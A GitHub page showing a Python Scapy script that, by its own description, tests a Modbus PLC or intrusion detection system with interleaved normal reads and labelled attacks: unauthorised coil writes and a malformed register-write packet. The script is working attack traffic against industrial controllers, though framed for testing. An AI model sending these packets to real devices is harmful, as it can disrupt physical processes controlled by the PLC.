-
Notifications
You must be signed in to change notification settings - Fork 0
/
TestScheme.py
116 lines (91 loc) · 3.38 KB
/
TestScheme.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
#!/usr/bin/env python
# v0.0.5
from scapy.all import *
import argparse
import time
load_contrib('modbus')
NUM_PACKETS_TO_SNIFF=100
#Parse arguments from command line at runtime
parser = argparse.ArgumentParser(description="Sends a variety of valid and invalid Modbus TCP packets from an 'attacker' to a user-defined IP address to test robustness of a PLC or IDS.")
parser.add_argument("dst_ip", help="IP address of Modbus PLC or IDS to test.")
parser.add_argument("dst_port", type=int, help="Port that the Modbus TCP service is running on the destination machine. If unsure, use port 502.")
args=parser.parse_args()
#Create a TCP connection to the specified address
sock = socket.socket()
sock.connect((args.dst_ip,502))
stream = StreamSocket(sock)
#Create various packets to send to the destination
#Use the following line to test sending a specific packet rather than the rest of the script.
#response=stream.sr(errorpacket)
#Normal behaviour - checking the 3 coils
read_coils=ModbusADURequest()/ModbusPDU01ReadCoilsRequest(startAddr=0,quantity=3)
#Normal behaviour - checking the button input
read_discrete_inputs=ModbusADURequest()/ModbusPDU02ReadDiscreteInputsRequest(startAddr=2,quantity=1)
#Write good data to green tlight
write_coil_low=ModbusADURequest()/ModbusPDU05WriteSingleCoilRequest(outputAddr=2,outputValue=0)
write_coil_high=ModbusADURequest()/ModbusPDU05WriteSingleCoilRequest(outputAddr=2,outputValue=1)
write_multiple_coils_low=ModbusADURequest()/ModbusPDU0FWriteMultipleCoilsRequest(outputsValue=[0],startingAddr=2,quantityOutput=1)
write_multiple_coils_high=ModbusADURequest()/ModbusPDU0FWriteMultipleCoilsRequest(outputsValue=[1],startingAddr=2,quantityOutput=1)
#ModbusPDU10WriteMultipleRegistersRequest
#Write erranous data
errorpacket=ModbusADURequest()/ModbusPDU10WriteMultipleRegistersRequest(startingAddr=1,outputsValue=[13],quantityRegisters=5L)
for i in range(0,5): #20
stream.sr(read_coils)
stream.sr(read_discrete_inputs)
time.sleep(0.5)
#ATTACK 1 - 4 packs
stream.sr(write_coil_low)
time.sleep(1)
stream.sr(write_coil_high)
print "Sent Coil Write Attack"
time.sleep(0.5)
for i in range(0,5): #20
stream.sr(read_coils)
stream.sr(read_discrete_inputs)
time.sleep(0.5)
#Send the desired packets # 2 packs
stream.sr(errorpacket)
print "Sent Coil Malformed Packet Attack"
time.sleep(0.5)
for i in range(0,5): #20
stream.sr(read_coils)
stream.sr(read_discrete_inputs)
time.sleep(0.5)
# 4 packs
stream.sr(write_multiple_coils_low)
time.sleep(1)
stream.sr(write_multiple_coils_high)
print "Sent Multiple Coil Write Attack"
time.sleep(0.5)
for i in range(0,5): # 20
stream.sr(read_coils)
stream.sr(read_discrete_inputs)
time.sleep(0.5)
#ATTACK 1 - 4 packs
stream.sr(write_coil_low)
time.sleep(1)
stream.sr(write_coil_high)
print "Sent Coil Write Attack"
time.sleep(0.5)
for i in range(0,5): #20
stream.sr(read_coils)
stream.sr(read_discrete_inputs)
time.sleep(0.5)
#Send the desired packets # 2 packs
stream.sr(errorpacket)
print "Sent Coil Malformed Packet Attack"
time.sleep(0.5)
for i in range(0,5): #20
stream.sr(read_coils)
stream.sr(read_discrete_inputs)
time.sleep(0.5)
# 4 packs
stream.sr(write_multiple_coils_low)
time.sleep(1)
stream.sr(write_multiple_coils_high)
print "Sent Multiple Coil Write Attack"
time.sleep(0.5)
for i in range(0,5): # 20
stream.sr(read_coils)
stream.sr(read_discrete_inputs)
time.sleep(0.5)